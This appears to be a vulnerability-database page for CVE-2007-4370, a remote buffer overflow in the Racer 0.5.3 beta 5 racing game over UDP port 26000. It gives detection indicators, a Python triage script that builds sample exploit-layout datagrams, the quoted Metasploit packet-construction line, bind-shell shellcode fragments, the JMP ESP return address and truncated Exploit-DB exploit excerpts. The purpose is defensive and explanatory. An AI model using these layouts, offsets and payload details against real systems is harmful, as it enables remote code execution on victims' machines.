CVE-2007-4370
Published 2007-08-15
Priority: P352 · Severity: high · CVSS 2.0: 7.5 (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available · EPSS: 59.20% (99.0th percentile)
Multiple buffer overflows in the (1) client and (2) server in Racer 0.5.3 beta 5 allow remote attackers to execute arbitrary code via a long string to UDP port 26000.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| racer | racer | — | — |
Detection & IOCs (extracted from sources)

Packet construction quoted from the Metasploit module:

```ruby
commandbuf = Rex::Text.rand_text_alphanumeric(1001); buf << [target.ret].pack('V'); buf << payload.encoded; buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length); udp_sock.put(buf)
```

Shellcodes quoted from the exploit sources:

- Run Calc.exe shellcode (alphanumeric encoded, 339 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...
- Bind shell on port 4444 shellcode (alphanumeric encoded, 238 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...

Indicators and caveats:

- Detect oversized UDP datagrams (>1000 bytes) sent to port 26000; that is the trigger condition for the buffer overflow in both the Racer client and server.
- The Metasploit module sends a 1001-byte random alphanumeric buffer, the 4-byte return address, the encoded payload, and random alphanumeric padding that brings payload plus padding to 1196 bytes, i.e. 2201 bytes in total, over UDP/26000. Alert on UDP/26000 datagrams exceeding 1000 bytes.
- The Metasploit payload uses AlphanumUpper encoding with bad characters \x5c and \x00. Only the encoded payload segment after the return address is uppercase-only: the 1001-byte prefix and the padding come from rand_text_alphanumeric and are mixed case, and the alphanumeric-encoded shellcodes quoted above open with a short non-alphanumeric GetPC stub (\xeb\x03\x59...). Look for a long run of uppercase alphanumeric bytes inside a large UDP/26000 datagram rather than for an all-uppercase datagram.
- The C exploit fills the packet buffer with repeated 'E' characters before appending the return address; a UDP/26000 payload consisting of a long run of 0x45 ('E') bytes is a strong indicator of exploitation.
- Post-exploitation, the bind-shell payload opens TCP port 4444 on the victim; monitor for unexpected listening services on port 4444 following inbound UDP/26000 traffic.
- The universal target uses a JMP ESP gadget in Fmodex.dll at 0x10073FB7; the presence of this return address (little-endian bytes B7 3F 07 10) in a UDP/26000 payload indicates Metasploit exploitation.
- The Metasploit module targets Windows only ('Platform' => 'win'); the NVD advisory notes that both client and server are affected, so both processes listening on UDP/26000 are attack surfaces.
- Payload space is limited to 1000 bytes and AlphanumUpper encoding is required; larger or non-alphanumeric shellcode will not fit without adjustment.
- The C exploit notes that the vulnerability can be exploited with either a classic stack overflow (JMP ESP) or an SEH-based method, so detection should account for both techniques.
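To turn the indicators above into something runnable, here is an added Python triage script (example code written for this page, not part of the exploit sources, the Metasploit module, or any detection tool). It constructs three sample UDP/26000 datagrams inline: one in the Metasploit layout quoted above, one in the C exploit's 'E'-fill layout, and one benign message. The payload bytes are a placeholder built from the 11-byte GetPC prefix shown in the quoted shellcodes plus random uppercase filler, not working shellcode. The 1001-byte 'E' fill length assumed for the C exploit, the 200-byte uppercase-run and 256-byte 'E'-run thresholds, and the indicator names are my assumptions, not values from the page.

```python
"""Heuristic triage of UDP/26000 datagrams against the CVE-2007-4370 indicators
listed above. Added example, not from the page or the exploit authors; the
sample datagrams are constructed here with placeholder payload bytes."""
import random
import string
import struct

RACER_PORT = 26000
OVERSIZE_THRESHOLD = 1000        # trigger condition quoted on the page
FMODEX_JMP_ESP = 0x10073FB7      # universal target return address (Metasploit)
RET_BYTES = struct.pack("<I", FMODEX_JMP_ESP)   # b"\xb7\x3f\x07\x10" on the wire
BAD_CHARS = frozenset(b"\x5c\x00")   # bad characters for the AlphanumUpper payload
MSF_SPACE = 1000                 # payload space quoted on the page
ALPHA_UPPER_MIN_RUN = 200        # assumed threshold for an encoded-payload run
E_FILL_MIN_RUN = 256             # assumed threshold for the C exploit's 'E' fill
UPPER_ALNUM = frozenset(string.ascii_uppercase.encode() + string.digits.encode())

# 11-byte non-alphanumeric GetPC prefix as shown in the quoted shellcodes, followed
# by constructed uppercase filler to 339 bytes: a placeholder, not working shellcode.
GETPC_PREFIX = b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49"
_rnd = random.Random(7)
SAMPLE_PAYLOAD = GETPC_PREFIX + "".join(
    _rnd.choice(string.ascii_uppercase + string.digits)
    for _ in range(339 - len(GETPC_PREFIX))).encode()


def _alnum(rnd, n):
    """Mixed-case alphanumeric filler, mirroring Rex::Text.rand_text_alphanumeric."""
    return "".join(rnd.choice(string.ascii_letters + string.digits) for _ in range(n)).encode()


def build_msf_style_datagram(payload, ret=FMODEX_JMP_ESP, seed=0):
    """Layout quoted from the Metasploit module: 1001 random alphanumerics, the
    return address packed little-endian, the payload, then random padding so that
    payload plus padding is 1196 bytes."""
    if len(payload) > MSF_SPACE:
        raise ValueError("payload exceeds the module's 1000-byte space")
    rnd = random.Random(seed)
    return _alnum(rnd, 1001) + struct.pack("<I", ret) + payload + _alnum(rnd, 1196 - len(payload))


def build_c_style_datagram(ret=FMODEX_JMP_ESP, fill_len=1001):
    """Layout described for the C exploit: a run of 'E' then the return address.
    fill_len=1001 is assumed from the Metasploit offset; the page does not state it."""
    return b"E" * fill_len + struct.pack("<I", ret)


def longest_single_byte_run(data):
    """(byte value, length) of the longest run of one repeated byte."""
    best = (None, 0)
    cur_byte, cur_len = None, 0
    for b in data:
        cur_byte, cur_len = (b, cur_len + 1) if b == cur_byte else (b, 1)
        if cur_len > best[1]:
            best = (cur_byte, cur_len)
    return best


def upper_alnum_runs(data):
    """Contiguous stretches of [A-Z0-9] bytes as (start, length) pairs."""
    runs, start = [], None
    for i, b in enumerate(data):
        if b in UPPER_ALNUM:
            start = i if start is None else start
        elif start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, len(data) - start))
    return runs


def classify(dst_port, payload):
    """Return the names of the indicators that fire for one UDP datagram."""
    findings = []
    if dst_port != RACER_PORT:
        return findings
    if len(payload) > OVERSIZE_THRESHOLD:
        findings.append("oversized_udp26000")
    if RET_BYTES in payload:
        findings.append("fmodex_jmp_esp")
    # Encoded payload: a long uppercase-alnum run built from many distinct bytes
    # (a run of a single repeated byte is the 'E' fill, handled separately).
    for start, length in upper_alnum_runs(payload):
        if length >= ALPHA_UPPER_MIN_RUN and len(set(payload[start:start + length])) >= 10:
            findings.append("alpha_upper_payload")
            break
    byte, run = longest_single_byte_run(payload)
    if byte == 0x45 and run >= E_FILL_MIN_RUN:
        findings.append("e_fill")
    return findings


def check_payload_constraints(shellcode):
    """Does a candidate payload fit the module's constraints quoted above?"""
    return {
        "fits": len(shellcode) <= MSF_SPACE,
        "bad_chars": sorted({b for b in shellcode if b in BAD_CHARS}),
        "non_upper_alnum": sum(1 for b in shellcode if b not in UPPER_ALNUM),
    }


if __name__ == "__main__":
    for name, dgram in (("metasploit-style", build_msf_style_datagram(SAMPLE_PAYLOAD)),
                        ("c-exploit-style", build_c_style_datagram()),
                        ("benign", b"hello racer")):
        print(f"{name:17s} {len(dgram):5d} bytes -> {classify(RACER_PORT, dgram)}")
```

The size check alone already fires on both exploit layouts, which is why the page's first indicator is the cheapest one to deploy; the return-address and byte-pattern checks are there to tell the two known exploits apart and to keep a large but legitimate datagram from being mistaken for an attack.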
No detection rules found.
Exploit-DB: Racer 0.5.3 Beta 5 - Remote Buffer Overflow (Metasploit) (exploitdb · 2010-09-20)

```ruby
##
# $Id: racer_503beta5.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Udp   # provides the udp_sock used to send the buffer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Racer v0.5.3 beta 5 Buffer Overflow',
      'Description' => %q{
        This module exploits the Racer Car and Racing Simulator game
        versions v0.5.3 beta 5 and earlier. Both the client and server listen
        on UDP port 26000. By sending an overly long buffer we are able to
        execute arbitrary code remotely.
      },
      'Author'      => [ 'Trancek ' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 103
```
Exploit-DB: Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow (exploitdb · 2009-03-20)

```c
/*
Racer vs 0.5.3 beta 5 Remote Stack Buffer Overflow (C) exploit by fl0 fl0w
Description: Bug found some time ago by n00b (Cheers mate! :D). I wanted to make a more
improved sploit, with lots of targets to choose from, and C, yes, is better :D.
Tested on Win XP Pro SP3; compile with DevC++ 4.9.9.2
Command line arguments: -ip        -> the ip of your target, default is 127.0.0.1
                        -port      -> default port is 26000
                        -shellcode -> well, guess.. :D
What does the exploit do?
You can run: Calc.exe, Bind shell on port 4444, Win32 Adduser
I've set the default port 26000 and ip 127.0.0.1.
How to use? Method?
-t 10 -ip 127.0.0.1 -port 26000
Classic buffer overflow, just jump to the payload and done!
It can be exploited using the SEH method too.
*/
#include
#i
```
Exploit-DB: Racer 0.5.3 Beta 5 - Remote Buffer Overflow (exploitdb · 2007-08-13)

```perl
#!/usr/bin/perl
# Credits to n00b.
################################################
# Racer v0.5.3 beta 5 (12-03-07) remote exploit.
# Racer is also prone to a buffer overflow in the
# server and client. Automatically the game opens
# UDP port 26000 and is waiting for a msg buffer.
# If we send an overly long buffer we are able to
# control the EIP register, and ESP holds enough
# buffer to have a good-size shellcode.
###############################################
# Tested: Win XP SP2 English
# Vendor's web site: http://www.racer.nl/
# Affected versions: all versions.
# Tested on: Racer v0.5.3 beta 5 (12-03-07).
# Special thanks to str0ke.
###########################
use IO::Socket;

IO::Socket::INET->new(PeerAddr => $ip,
                      PeerPort => $port,
                      Proto    => $protocol,
                      Timeout  => '1') ||
```
Metasploit: Racer v0.5.3 Beta 5 Buffer Overflow

This module exploits the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely.
No writeups or analysis indexed.
References:

- http://osvdb.org/39601
- http://www.securityfocus.com/bid/25297
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35991
- https://www.exploit-db.com/exploits/4283